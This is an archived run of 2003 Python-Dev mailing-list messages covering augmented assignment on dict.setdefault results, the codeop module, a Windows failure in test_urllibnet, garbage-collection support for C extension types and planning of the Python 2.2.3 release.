> 
> Luke>  ...
> Luke>       ...
> Luke> 	      ...
> 
> Luke> 			add(log.setdefault(r, ''), "test %d\n" % t)
> 
> Luke> ... ARGH!  just checked - NOPE!  add doesn't work.
> Luke> and there's no function "radd" or "__radd__" in the
> Luke> operator module.
> 
> Why can't you do this?
> 
>         for t in range(5):
>                 for r in range(10):
>                         foo = log.setdefault(r,'')
>                         foo += "test %d\n" % t
 
 after running this code,

 log = {0: '', 1: '', 2:'', 3: '' ... 9: ''}

 and foo equals "test 5".

 if, however, you do this:

         for t in range(5):
                 for r in range(10):
                         foo = log.setdefault(r,[])
                         foo.append("test %d\n" % t)
 
 then empirically i conclude that you DO end up with the
 expected results (but is this true all of the time?)

 the reason why your example, andrew, does not work, is
 because '' is a string - a basic type to which a pointer is
 NOT returned i presume that the foo += "test %d"... returns a
 DIFFERENT result object such that the string in the dictionary
 is DIFFERENT from the string result of foo being updated.

 if that makes absolutely no sense whatsoever then think of it
 being the difference between integers and pointers-to-integers
 in c.

 
 can anyone tell me if there are any PARTICULAR circumstances where

                         foo = log.setdefault(r,[])
                         foo.append("test %d\n" % t)

 will FAIL to work as expected?



 andrew, sorry it took me so long to respond: i initially
 thought that under all circumstances for all types of foo,
 your example would work.

 l.


-- 
-- 
expecting email to be received and understood is a bit like
picking up the telephone and immediately dialing without
checking for a dial-tone; speaking immediately without listening
for either an answer or ring-tone; hanging up immediately and
then expecting someone to call you (and to be able to call you).
--
every day, people send out email expecting it to be received
without being tampered with, read by other people, delayed or
simply - without prejudice but lots of incompetence - destroyed.
--
please therefore treat email more like you would a CB radio
to communicate across the world (via relaying stations):
ask and expect people to confirm receipt; send nothing that
you don't mind everyone in the world knowing about...


From guido@python.org  Fri May 16 01:27:58 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 15 May 2003 20:27:58 -0400
Subject: [Python-Dev] Simple dicts
In-Reply-To: "Your message of Thu, 15 May 2003 18:25:13 EDT."
 <006301c31b30$da69e8e0$6401a8c0@damien>
References: <006301c31b30$da69e8e0$6401a8c0@damien>
Message-ID: <200305160027.h4G0Rwa17853@pcp02138704pcs.reston01.va.comcast.net>

> There seem to be two different ways to get/set/del from a dictionary.
> 
> The first is using PyDict_[Get|Set|Del]Item()

This is the API that all C code uses (except code that doesn't know
whether it's dealing with dicts or some other mapping, which has to
use PyObject_GetItem() etc, which is even slower).

> The second is using the embarssingly named dict_ass_sub() and its
> partner dict_subscript().

This is what PyObject_GetItem() calls.

> Which of these two access methods is most likely to be used?

That's a hard question.  Maybe a profiler can answer.  The thing is,
there's a lot of C code that calls PyDict_GetItem() directly, e.g. the
attribute lookup code.  Bot of course there's also a lot of Python
code using dicts.

Yet, I'd bet on PyDict_*().

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri May 16 01:32:19 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 15 May 2003 20:32:19 -0400
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
Message-ID: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>

I'm going on vacation tomorrow; I'll be in Holland for 10 days and
will return to the US on May 26.  I expect to have some email access
but won't use it much.

Now, I'd like Python 2.2.3 to be released soon.  Barry has volunteered
to be the release manager.  I think it's pretty much ready to go out
any time, except that Jeremy mentioned that he has a few things he'd
like to backport; since Jeremy and Barry share an office I'm sure they
can work this out. :-)

I won't be disappointed if 2.2.3 hasn't been released yet when I'm
back, but I won't be surprised if in fact it does go out while I'm
gone -- it's ready, stick a fork in it! :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)



From cnetzer@mail.arc.nasa.gov  Fri May 16 01:56:43 2003
From: cnetzer@mail.arc.nasa.gov (Chad Netzer)
Date: 15 May 2003 17:56:43 -0700
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1053046603.972.31.camel@sayge.arc.nasa.gov>

On Thu, 2003-05-15 at 17:32, Guido van Rossum wrote:

> Now, I'd like Python 2.2.3 to be released soon.  Barry has volunteered
> to be the release manager.

Stupid question.  Where can I get a prerelease (or CVS access) to 2.2.3,
or a list of patches/features applied since 2.2.2?  I looked around for
the info, but apparently not hard enough (or I just don't understand CVS
branching well enough).

Chad




From tim.one@comcast.net  Fri May 16 02:06:27 2003
From: tim.one@comcast.net (Tim Peters)
Date: Thu, 15 May 2003 21:06:27 -0400
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <1053046603.972.31.camel@sayge.arc.nasa.gov>
Message-ID: <LNBBLJKPBEHFEDALKOLCAELMEFAB.tim.one@comcast.net>

[Chad Netzer]
> Stupid question.  Where can I get a prerelease (or CVS access) to 2.2.3,
> or a list of patches/features applied since 2.2.2?  I looked around for
> the info, but apparently not hard enough (or I just don't understand CVS
> branching well enough).

It's not a stupid question, it's a maddening feature of CVS that there's no
place to store meta-data about branches.  What you want to do is pass this
argument to the checkout command:

    -r release22-maint

There's no reasonable way you could have guess that.  The Misc/NEWS file in
that branch summarizes the changes since 2.2.2 (at least those fixes that
people bothered to make a NEWS entry for <winK>).



From guido@python.org  Fri May 16 02:28:01 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 15 May 2003 21:28:01 -0400
Subject: [Python-Dev] codeop: small details (Q); commit priv request
In-Reply-To: "Your message of Mon, 12 May 2003 16:48:01 +0200."
 <5.2.1.1.0.20030512140727.02362ab0@localhost>
References: <5.2.1.1.0.20030512140727.02362ab0@localhost>
Message-ID: <200305160128.h4G1S1U18083@pcp02138704pcs.reston01.va.comcast.net>

> 1)
> 
> Python 2.3b1 (#40, Apr 25 2003, 19:06:24) [MSC v.1200 32 bit (Intel)] on win32
> Type "help", "copyright", "credits" or "license" for more information.
>  >>> import codeop
>  >>> codeop.compile_command("",symbol="eval")
> Traceback (most recent call last):
>    File "<stdin>", line 1, in ?
>    File "s:\transit\py23\lib\codeop.py", line 129, in compile_command
>      return _maybe_compile(_compile, source, filename, symbol)
>    File "s:\transit\py23\lib\codeop.py", line 106, in _maybe_compile
>      raise SyntaxError, err1
>    File "<input>", line 1
>      pass
>         ^
> SyntaxError: invalid syntax
> 
> 
> the error is basically an artifact of the logic that enforces:
> 
> compile_command("",symbol="single") === compile_command("pass",symbol="single")
> 
> (this makes typing enter immediately after the prompt at a simulated shell 
> a nop as expected)
> 
> I would expect
> 
> compile_command("",symbol="eval")
> 
> to return None, i.e. to simply signal an incomplete expression (that is 
> what would happen if the code for "eval" case would avoid the cited logic).

Thanks for reporting this.  I've fixed this by avoiding the change to
"pass" when symbol == "eval".

> 2) symbol = "exec" is silently accepted but the documentation intentionally 
> only refers to "exec" and "single" as valid values for symbol. Maybe a 
> ValueError should be raised.

I don't know that that is intentional.  I'd say that, like for the
built-in compile(), the valid values for symbol should be "eval",
"exec", and "single", and the docs ought to be updated (I didn't fix
this).

> Context: I was working on improving Jython codeop compatibility with 
> CPython codeop.

Cool.

> Btw, as considered here by Guido 
> http://sourceforge.net/tracker/index.php?func=detail&aid=645404&group_id=5470&atid=305470
> I would ask to have commit privileges for CPython

Barry has sworn you in by now.  Welcome to the club!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From Anthony Baxter <anthony@interlink.com.au>  Fri May 16 02:47:11 2003
From: Anthony Baxter <anthony@interlink.com.au> (Anthony Baxter)
Date: Fri, 16 May 2003 11:47:11 +1000
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200305160147.h4G1lCa09066@localhost.localdomain>

>>> Guido van Rossum wrote
> Now, I'd like Python 2.2.3 to be released soon.  Barry has volunteered
> to be the release manager.  I think it's pretty much ready to go out
> any time, except that Jeremy mentioned that he has a few things he'd
> like to backport; since Jeremy and Barry share an office I'm sure they
> can work this out. :-)

There's a bunch of cvs commit messages I've saved off as "potential
branch-patches". I might try to get to them this weekend.


-- 
Anthony Baxter     <anthony@interlink.com.au>   
It's never too late to have a happy childhood.



From barry@python.org  Fri May 16 03:04:57 2003
From: barry@python.org (Barry Warsaw)
Date: 15 May 2003 22:04:57 -0400
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1053050696.26479.35.camel@geddy>

On Thu, 2003-05-15 at 20:32, Guido van Rossum wrote:
> I'm going on vacation tomorrow; I'll be in Holland for 10 days and
> will return to the US on May 26.  I expect to have some email access
> but won't use it much.
> 
> Now, I'd like Python 2.2.3 to be released soon.  Barry has volunteered
> to be the release manager.  I think it's pretty much ready to go out
> any time, except that Jeremy mentioned that he has a few things he'd
> like to backport; since Jeremy and Barry share an office I'm sure they
> can work this out. :-)
> 
> I won't be disappointed if 2.2.3 hasn't been released yet when I'm
> back, but I won't be surprised if in fact it does go out while I'm
> gone -- it's ready, stick a fork in it! :-)

FWIW, I'm going to be around, and am fairly free during the US Memorial
Day weekend 24th - 26th.  Can we shoot for getting a release out that
weekend?  If we can code freeze by the 22nd, I can throw together a
release candidate on Friday (with Tim's help for Windows) and a final by
Monday.

What do you folks think?
-Barry




From fdrake@acm.org  Fri May 16 03:30:07 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 15 May 2003 22:30:07 -0400
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <1053050696.26479.35.camel@geddy>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
 <1053050696.26479.35.camel@geddy>
Message-ID: <16068.19759.176884.680744@grendel.zope.com>

Barry Warsaw writes:
 > FWIW, I'm going to be around, and am fairly free during the US Memorial
 > Day weekend 24th - 26th.  Can we shoot for getting a release out that
 > weekend?  If we can code freeze by the 22nd, I can throw together a
 > release candidate on Friday (with Tim's help for Windows) and a final by
 > Monday.

I'll be away that Friday through Tuesday, and don't expect any kind of
internet/email access.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From barry@python.org  Fri May 16 03:43:09 2003
From: barry@python.org (Barry Warsaw)
Date: 15 May 2003 22:43:09 -0400
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <16068.19759.176884.680744@grendel.zope.com>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
 <1053050696.26479.35.camel@geddy>
 <16068.19759.176884.680744@grendel.zope.com>
Message-ID: <1053052989.26479.39.camel@geddy>

On Thu, 2003-05-15 at 22:30, Fred L. Drake, Jr. wrote:
> Barry Warsaw writes:
>  > FWIW, I'm going to be around, and am fairly free during the US Memorial
>  > Day weekend 24th - 26th.  Can we shoot for getting a release out that
>  > weekend?  If we can code freeze by the 22nd, I can throw together a
>  > release candidate on Friday (with Tim's help for Windows) and a final by
>  > Monday.
> 
> I'll be away that Friday through Tuesday, and don't expect any kind of
> internet/email access.

So can we have all the doc changes in place before then, or should we
freeze on Wednesday?

-Barry




From fdrake@acm.org  Fri May 16 04:03:11 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 15 May 2003 23:03:11 -0400
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <1053052989.26479.39.camel@geddy>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
 <1053050696.26479.35.camel@geddy>
 <16068.19759.176884.680744@grendel.zope.com>
 <1053052989.26479.39.camel@geddy>
Message-ID: <16068.21743.727134.815827@grendel.zope.com>

Barry Warsaw writes:
 > So can we have all the doc changes in place before then, or should we
 > freeze on Wednesday?

We can probably have things done; there's only one big thing that
needs to be back-ported in the docs.  (I'm pretty sure we solved a
fonts problem on the trunk; that fix really needs to be back-ported,
but I'll have to spend a little time digging it out.  This is really
reason to separate the documentation processing tools from the doc
tree.)

Normally, the docs distributed with a release candidate are marked as
being for the RC in the versioning; I could build both sets of
packages ahead of time if we get the CVS tagging right.  That would
prevent any changes to the docs after the RC, which should be fine.
We can deal with the mechanics of that next week, to the extent that
anything much needs to happen.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From mwh@python.net  Fri May 16 11:47:51 2003
From: mwh@python.net (Michael Hudson)
Date: Fri, 16 May 2003 11:47:51 +0100
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <200305160147.h4G1lCa09066@localhost.localdomain> (Anthony
 Baxter's message of "Fri, 16 May 2003 11:47:11 +1000")
References: <200305160147.h4G1lCa09066@localhost.localdomain>
Message-ID: <2mn0hnyxpk.fsf@starship.python.net>

Anthony Baxter <anthony@interlink.com.au> writes:

>>>> Guido van Rossum wrote
>> Now, I'd like Python 2.2.3 to be released soon.  Barry has volunteered
>> to be the release manager.  I think it's pretty much ready to go out
>> any time, except that Jeremy mentioned that he has a few things he'd
>> like to backport; since Jeremy and Barry share an office I'm sure they
>> can work this out. :-)
>
> There's a bunch of cvs commit messages I've saved off as "potential
> branch-patches". I might try to get to them this weekend.

My python-bugfixes mbox is still online:

    http://starship.python.net/crew/mwh/python-bugfixes

Some of it might still be relavent -- I haven't been that conscientious
about keeping it up to date.

Cheers,
M.

-- 
  The PROPER way to handle HTML postings is to cancel the article,
  then hire a hitman to kill the poster, his wife and kids, and fuck
  his dog and smash his computer into little bits. Anything more is
  just extremism.                                 -- Paul Tomblin, asr


From ark@research.att.com  Fri May 16 13:07:23 2003
From: ark@research.att.com (Andrew Koenig)
Date: 16 May 2003 08:07:23 -0400
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <20030515214417.GF3900@localhost>
References: <20030402090726.GN1048@localhost>
 <yu99n0j9gdas.fsf@europa.research.att.com>
 <20030515214417.GF3900@localhost>
Message-ID: <yu99vfwbf62s.fsf@europa.research.att.com>

ark> Why can't you do this?

ark> for t in range(5):
ark>     for r in range(10):
ark>         foo = log.setdefault(r,'')
ark>             foo += "test %d\n" % t
 
Luke>  after running this code,

Luke>  log = {0: '', 1: '', 2:'', 3: '' ... 9: ''}

Luke>  and foo equals "test 5".

Then that is what foo would be if you were able to write

        log.setdefault(r,'') += "test %d\n" % t

as you had wished.

Luke>  if, however, you do this:

Luke>          for t in range(5):
Luke>                  for r in range(10):
Luke>                          foo = log.setdefault(r,[])
Luke>                          foo.append("test %d\n" % t)
 
Luke>  then empirically i conclude that you DO end up with the
Luke>  expected results (but is this true all of the time?)

I presume that is because you are now dealing with vectors instead
of strings.  In that case, you could also have written

        for t in range(5):
                for r in range(10):
                        foo = log.setdefault(r,[])
                        foo += ["test %d]n" % t]

with the same effect.

Luke>  the reason why your example, andrew, does not work, is
Luke>  because '' is a string - a basic type to which a pointer is
Luke>  NOT returned i presume that the foo += "test %d"... returns a
Luke>  DIFFERENT result object such that the string in the dictionary
Luke>  is DIFFERENT from the string result of foo being updated.

Well, yes.  But that is what you would have gotten had you been allowed
to write

                log.setdefault(r,"") += <whatever>

in the first place.

Luke>  if that makes absolutely no sense whatsoever then think of it
Luke>  being the difference between integers and pointers-to-integers
Luke>  in c.

I think this analogy is pointless, as the only people who will understand
it are those who didn't need it in the first place :-)
 
Luke>  can anyone tell me if there are any PARTICULAR circumstances where

Luke>                          foo = log.setdefault(r,[])
Luke>                          foo.append("test %d\n" % t)

Luke>  will FAIL to work as expected?

It will fail if your expectations are incorrect or unrealistic.

Luke>  andrew, sorry it took me so long to respond: i initially
Luke>  thought that under all circumstances for all types of foo,
Luke>  your example would work.

But it does!  At least in the sense of the original query.

The original query was of the form

        Why can't I write an expression like  f(x) += y?

and my answer was, in effect, 

        If you could, it would have the same effect as if you had written

            foo = f(x)
            foo += y

        and then used the value of foo.

Perhaps I'm missing something, but I don't think that anything you've said
contradicts this answer.

-- 
Andrew Koenig, ark@research.att.com, http://www.research.att.com/info/ark


From jepler@unpythonic.net  Fri May 16 13:34:42 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Fri, 16 May 2003 07:34:42 -0500
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <yu99vfwbf62s.fsf@europa.research.att.com>
References: <20030402090726.GN1048@localhost> <yu99n0j9gdas.fsf@europa.research.att.com> <20030515214417.GF3900@localhost> <yu99vfwbf62s.fsf@europa.research.att.com>
Message-ID: <20030516123440.GA933@unpythonic.net>

It seems almost within the bounds of possibility that pychecker
could learn to find bugs of the form
    t = expression # t results from computation
    t += i         # inplace op on (immutable/no-__iadd__) t
    del t          # or t otherwise not used before function return
by doing type and liveness analysis on t. (the type analysis being the
hard part)

Is there any time that the described situation would not be a bug?  I
can't see it.

Jeff


From lkcl@samba-tng.org  Fri May 16 15:24:51 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Fri, 16 May 2003 14:24:51 +0000
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <yu99vfwbf62s.fsf@europa.research.att.com>
References: <20030402090726.GN1048@localhost> <yu99n0j9gdas.fsf@europa.research.att.com> <20030515214417.GF3900@localhost> <yu99vfwbf62s.fsf@europa.research.att.com>
Message-ID: <20030516142451.GI6196@localhost>

On Fri, May 16, 2003 at 08:07:23AM -0400, Andrew Koenig wrote:
> ark> Why can't you do this?
> 
> ark> for t in range(5):
> ark>     for r in range(10):
> ark>         foo = log.setdefault(r,'')
> ark>             foo += "test %d\n" % t
>  
> Luke>  after running this code,
> 
> Luke>  log = {0: '', 1: '', 2:'', 3: '' ... 9: ''}
> 
> Luke>  and foo equals "test 5".
> 
> Then that is what foo would be if you were able to write
> 
>         log.setdefault(r,'') += "test %d\n" % t
> 
> as you had wished.
 
 hmm...

 ..mmmm...

 you're absolutely right!!!


> Luke>  if, however, you do this:
> 
> Luke>          for t in range(5):
> Luke>                  for r in range(10):
> Luke>                          foo = log.setdefault(r,[])
> Luke>                          foo.append("test %d\n" % t)
>  
> Luke>  then empirically i conclude that you DO end up with the
> Luke>  expected results (but is this true all of the time?)
> 
> I presume that is because you are now dealing with vectors instead
> of strings.  In that case, you could also have written
> 
>         for t in range(5):
>                 for r in range(10):
>                         foo = log.setdefault(r,[])
>                         foo += ["test %d]n" % t]
> 
> with the same effect.
> 
> Luke>  the reason why your example, andrew, does not work, is
> Luke>  because '' is a string - a basic type to which a pointer is
> Luke>  NOT returned i presume that the foo += "test %d"... returns a
> Luke>  DIFFERENT result object such that the string in the dictionary
> Luke>  is DIFFERENT from the string result of foo being updated.
> 
> Well, yes.  But that is what you would have gotten had you been allowed
> to write
> 
>                 log.setdefault(r,"") += <whatever>
> 
> in the first place.

 [i oversimplified in the example, leading to all the communication
  problems.

  the _actual_  usage i was expecting is based on {}.setdefault(0, []) += [1,2]
  rather than setdefault(0, '') += 'hh'

 ]


> Luke>  can anyone tell me if there are any PARTICULAR circumstances where
> 
> Luke>                          foo = log.setdefault(r,[])
> Luke>                          foo.append("test %d\n" % t)
> 
> Luke>  will FAIL to work as expected?
> 
> It will fail if your expectations are incorrect or unrealistic.
 
 ...  that sounds like a philosophical or "undefined" answer rather
 than the technical one i was seeking

 ... but it is actually quite a _useful_ answer :)

 to put the question in a different way, or to say again, to put
 a different, more specific, question:

 can anyone tell me if there are circumstances under which the second
 argument from setdefault will SOMETIMES be copied instead of returned
 and SOMETIMES be returned as-is, such that operations of the type
 being attempted will SOMETIMES work as expected and SOMETIMES not?

 
> Luke>  andrew, sorry it took me so long to respond: i initially
> Luke>  thought that under all circumstances for all types of foo,
> Luke>  your example would work.
> 
> But it does!  At least in the sense of the original query.
 
  where the sense was mistaken, consequently the results are not,
  as you rightly pointed out, not as expected.

> The original query was of the form
> 
>         Why can't I write an expression like  f(x) += y?
> 
> and my answer was, in effect, 
> 
>         If you could, it would have the same effect as if you had written
> 
>             foo = f(x)
>             foo += y
> 
>         and then used the value of foo.
> 
> Perhaps I'm missing something, but I don't think that anything you've said
> contradicts this answer.

 based on this clarification, my queries are two-fold:

 1) what is the technical, syntactical or language-specific reason why
    I can't write an expression like  f(x) += y ?

 
 2) the objections that i can see as to why f(x) += y should not be
    _allowed_ to work are that, as andrew points out, some people's
	expectations of any_function() += y may be unrealistic,
	particularly as normally the result of a function is discarded.
 
 	however, in the case of setdefault() and get() on dictionaries,
	the result of the function is NOT discarded: in SOME instances,
	a reference is returned to the dictionary item.

	under such circumstances, why should the objections - to disallow
	{}.setdefault(0, []) += [] or {}.get([]) += [] - stand?
	
 l.



From tim@zope.com  Fri May 16 15:30:37 2003
From: tim@zope.com (Tim Peters)
Date: Fri, 16 May 2003 10:30:37 -0400
Subject: [Python-Dev] test_urllibnet failing on Windows
Message-ID: <BIEJKCLHCIOIHAGOKOLHEEHIFLAA.tim@zope.com>

I'm not familiar with this test.

In a release build:

"""
C:\Code\python\PCbuild>python ../lib/test/test_urllibnet.py
testURLread (__main__.URLTimeoutTest) ... ok
test_bad_address (__main__.urlopenNetworkTests) ... ok
test_basic (__main__.urlopenNetworkTests) ... ok
test_fileno (__main__.urlopenNetworkTests) ... ERROR
test_geturl (__main__.urlopenNetworkTests) ... ok
test_info (__main__.urlopenNetworkTests) ... ok
test_readlines (__main__.urlopenNetworkTests) ... ok
test_basic (__main__.urlretrieveNetworkTests) ... ok
test_header (__main__.urlretrieveNetworkTests) ... ok
test_specified_path (__main__.urlretrieveNetworkTests) ... ok

======================================================================
ERROR: test_fileno (__main__.urlopenNetworkTests)
----------------------------------------------------------------------
Traceback (most recent call last):
  File "../lib/test/test_urllibnet.py", line 91, in test_fileno
    FILE = os.fdopen(fd)
OSError: (0, 'Error')

----------------------------------------------------------------------
Ran 10 tests in 7.081s

FAILED (errors=1)
Traceback (most recent call last):
  File "../lib/test/test_urllibnet.py", line 149, in ?
    test_main()
  File "../lib/test/test_urllibnet.py", line 146, in test_main
    urlretrieveNetworkTests)
  File "C:\Code\python\lib\test\test_support.py", line 259, in run_unittest
    run_suite(suite, testclass)
  File "C:\Code\python\lib\test\test_support.py", line 247, in run_suite
    raise TestFailed(err)
test.test_support.TestFailed: Traceback (most recent call last):
  File "../lib/test/test_urllibnet.py", line 91, in test_fileno
    FILE = os.fdopen(fd)
OSError: (0, 'Error')
"""

In a debug build:

"""
C:\Code\python\PCbuild>python_d ../lib/test/test_urllibnet.py
testURLread (__main__.URLTimeoutTest) ... ok
test_bad_address (__main__.urlopenNetworkTests) ... ok
test_basic (__main__.urlopenNetworkTests) ... ok
test_fileno (__main__.urlopenNetworkTests) ...
"""

and there it dies with an assertion error in the bowels of Microsoft's
fdopen.c.  That's called by Python's posix_fdopen, here:

	fp = fdopen(fd, mode);

At this point, fd is 436.  MS's fdopen is unhappy because only 32 handles
actually exist at this point, and 436 is bigger than that.  In the release
build, the MS assert doesn't (of course) trigger; instead, that 436 >= 32
causes MS's fdopen to return NULL.



From skip@pobox.com  Fri May 16 15:41:22 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 16 May 2003 09:41:22 -0500
Subject: [Python-Dev] test_urllibnet failing on Windows
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHEEHIFLAA.tim@zope.com>
References: <BIEJKCLHCIOIHAGOKOLHEEHIFLAA.tim@zope.com>
Message-ID: <16068.63634.915049.706423@montanaro.dyndns.org>

    Tim> I'm not familiar with this test.
    Tim> In a release build:
    ...

Brett added a bunch of tests to that file the other day.  I imagine he'll
take a look when the sun comes up on the west coast.

Skip


From guido@python.org  Fri May 16 16:02:59 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 16 May 2003 11:02:59 -0400
Subject: [Python-Dev] test_urllibnet failing on Windows
In-Reply-To: "Your message of Fri, 16 May 2003 10:30:37 EDT."
 <BIEJKCLHCIOIHAGOKOLHEEHIFLAA.tim@zope.com>
References: <BIEJKCLHCIOIHAGOKOLHEEHIFLAA.tim@zope.com>
Message-ID: <200305161502.h4GF2xk20132@pcp02138704pcs.reston01.va.comcast.net>

> I'm not familiar with this test.

Me neither, but Brett C should be. :-)

> In a debug build:
> 
> """
> C:\Code\python\PCbuild>python_d ../lib/test/test_urllibnet.py
> testURLread (__main__.URLTimeoutTest) ... ok
> test_bad_address (__main__.urlopenNetworkTests) ... ok
> test_basic (__main__.urlopenNetworkTests) ... ok
> test_fileno (__main__.urlopenNetworkTests) ...
> """
> 
> and there it dies with an assertion error in the bowels of Microsoft's
> fdopen.c.  That's called by Python's posix_fdopen, here:
> 
> 	fp = fdopen(fd, mode);
> 
> At this point, fd is 436.  MS's fdopen is unhappy because only 32
> handles actually exist at this point, and 436 is bigger than that.
> In the release build, the MS assert doesn't (of course) trigger;
> instead, that 436 >= 32 causes MS's fdopen to return NULL.

The test assumes that the fileno() from a socket object can be passed
to os.fdopen().  That works on Unix.  But on Windows it cannot, the
small ints used to refer to open files are chosen from a different
(though potentially overlapping) space than the small ints used to
refer to open sockets, and the two cannot be mixed.

So the test should be disabled on Windows.

I don't know if we can protect os.fdopen() from crashing when passed
an out of range number.

--Guido van Rossum (home page: http://www.python.org/~guido/)



From barry@python.org  Fri May 16 16:09:05 2003
From: barry@python.org (Barry Warsaw)
Date: 16 May 2003 11:09:05 -0400
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <2mn0hnyxpk.fsf@starship.python.net>
References: <200305160147.h4G1lCa09066@localhost.localdomain>
 <2mn0hnyxpk.fsf@starship.python.net>
Message-ID: <1053097745.1849.26.camel@barry>

On Fri, 2003-05-16 at 06:47, Michael Hudson wrote:

> > There's a bunch of cvs commit messages I've saved off as "potential
> > branch-patches". I might try to get to them this weekend.
> 
> My python-bugfixes mbox is still online:
> 
>     http://starship.python.net/crew/mwh/python-bugfixes
> 
> Some of it might still be relavent -- I haven't been that conscientious
> about keeping it up to date.

I definitely do not have the time to triage or apply backports.  I think
you'll have to use your own judgment, tempered by your available time,
to decide which patches should be backported.  Guido obviously thinks
2.2.3 is ready now so you should prioritize, but be conservative.

If you have specific questions, python-dev is the place to ask.

-Barry




From tim@zope.com  Fri May 16 16:33:24 2003
From: tim@zope.com (Tim Peters)
Date: Fri, 16 May 2003 11:33:24 -0400
Subject: [Python-Dev] test_urllibnet failing on Windows
In-Reply-To: <200305161502.h4GF2xk20132@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHKEHNFLAA.tim@zope.com>

[Guido]
> The test assumes that the fileno() from a socket object can be passed
> to os.fdopen().

Yup, Jeremy figured that out here.  I have a patch waiting to go, but SF
isn't cooperating.

> That works on Unix.  But on Windows it cannot, the small ints used to
> refer to open files are chosen from a different (though potentially
> overlapping) space than the small ints used to refer to open sockets,
> and the two cannot be mixed.

Just so.

> So the test should be disabled on Windows.
>
> I don't know if we can protect os.fdopen() from crashing when passed
> an out of range number.

This is an issue only in the MSVC debug build.  The release-build MS
libraries *still* explicitly check for out-of-range, and arrange for an
error return when it is out of range.  I really don't understand why they're
asserting in-range in their debug build libraries, because nothing in
*their* code assumes the fd is in-range -- their code is defensive enough in
the release build that nothing bad will happen even when it is out of range.



From barry@python.org  Fri May 16 16:44:44 2003
From: barry@python.org (Barry Warsaw)
Date: 16 May 2003 11:44:44 -0400
Subject: [Python-Dev] [development doc updates]
In-Reply-To: <20030516153518.68B1B18EC13@grendel.zope.com>
References: <20030516153518.68B1B18EC13@grendel.zope.com>
Message-ID: <1053099884.1849.49.camel@barry>

On Fri, 2003-05-16 at 11:35, Fred L. Drake wrote:
> The development version of the documentation has been updated:
> 
>     http://www.python.org/dev/doc/devel/
> 
> Various updates, including Jim Fulton's efforts on updating the Extending &
> Embedding manual.

I think this one's gonna make my Python quotes file:

"So, if you want to define a new object type, you need to create a new
type object."

:)
-Barry




From jim@zope.com  Fri May 16 16:46:19 2003
From: jim@zope.com (Jim Fulton)
Date: Fri, 16 May 2003 11:46:19 -0400
Subject: [Python-Dev] C new-style classes and GC
Message-ID: <3EC507CB.6080502@zope.com>

Lately I've been re-learning how to write new types in C.  Things
changed drastically (for the better) in 2.2. I've been updating the
documentation on writing new types as I go:

http://www.python.org/dev/doc/devel/ext/defining-new-types.html

(I'm also updating modulator.)

I'm starting to try to figure out how to integrate support for GC.
The current documentation in the section "Supporting the Cycle
Collector" doesn't reflect new-style types and is, thus, out of date.

Frankly, I'm taking the approach that there is only One Way to create
types in C, the new way, based on new-style types as now documented
in the manual.

I'll also note that most new-style types don't need and thus don't
implement custom allocators. They leave the tp_alloc and tp_free slots
empty.

So given that we have a new style type, to add support for GC, we need
to:

- Set the Py_TPFLAGS_HAVE_GC type flag,

- Provide implementations of tp_traverse and tp_clear, as described in
   the section "Supporting the Cycle Collector" section of the docs.

- Call PyObject_GC_UnTrack at the beginning of the deallocator,
   before decrefing any members.

I think that that is *all* we have to do.

In particular, since we have a new style type that inherits the
standard allocator, we don't need to fool with PyObject_GC_New, and
PyObject_GC_DEL, because the default tp_alloc and tp_free take care of
that for us. Similarly, we don't need to call PyObject_GC_Track,
because that is done by the default allocator. (Because of that, our
traverse function has to check for null object pointers in our
object's members.)

Did I get this right? I intend to update the docs to reflect this
understanding (or a corrected one, of course).

Jim

-- 
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (703) 361-1714            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org



From mwh@python.net  Fri May 16 17:03:10 2003
From: mwh@python.net (Michael Hudson)
Date: Fri, 16 May 2003 17:03:10 +0100
Subject: [Python-Dev] [development doc updates]
In-Reply-To: <1053099884.1849.49.camel@barry> (Barry Warsaw's message of "16
 May 2003 11:44:44 -0400")
